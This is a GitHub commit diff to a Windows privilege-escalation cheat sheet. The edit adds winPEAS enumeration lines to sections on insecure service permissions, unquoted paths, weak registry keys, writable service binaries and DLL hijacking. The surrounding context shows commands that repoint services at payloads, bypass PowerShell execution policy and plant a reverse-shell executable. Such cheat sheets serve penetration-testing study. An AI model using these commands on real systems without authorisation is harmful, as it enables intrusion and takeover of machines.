kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-09-03 10:04:03 -04:00
committed by GitHub
parent 65f5d2fe17
commit d0baade54b
1 changed files with 15 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
README.md
View File

@@ -730,15 +730,13 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
##### Services
```ps1
# Enumeration
.\winPEASany.exe quiet servicesinfo
#########################################################################
#### 1. Insecure Service Properties #####################################
#########################################################################
# Winpeas Enumeration
.\winPEASany.exe quiet servicesinfo
# Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -754,11 +752,13 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
# Start a service:
net start {SERVICE}
#########################################################################
##### 2. Unquoted Service Path ##########################################
#########################################################################
# Winpeas Enumeration
.\winPEASany.exe quiet servicesinfo
# Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -777,6 +777,9 @@ net start {SERVICE}
#### 3. Weak Registry Permissions #######################################
#########################################################################
# Winpeas Enumeration
.\winPEASany.exe quiet servicesinfo
# Check regsvc for weak entries using powershell
powershell -exec bypass
@@ -802,6 +805,9 @@ net start regsvc
##### 4. Insecure Service Executables (File Permissions: Everyone) ######
#########################################################################
# Winpeas Enumeration
.\winPEASany.exe quiet servicesinfo
# Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
@@ -818,6 +824,9 @@ net start filepermsvc
#### 5. DLL Hijacking ###################################################
#########################################################################
# Winpeas Enumeration
.\winPEASany.exe quiet servicesinfo
# Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uvqc dllsvc
@@ -873,7 +882,6 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
#### 2. AlwaysInstallElevated ###########################################
#########################################################################
# Winpeas Enumeration to see if both registry values are set
.\winPEASany.exe quiet windowscreds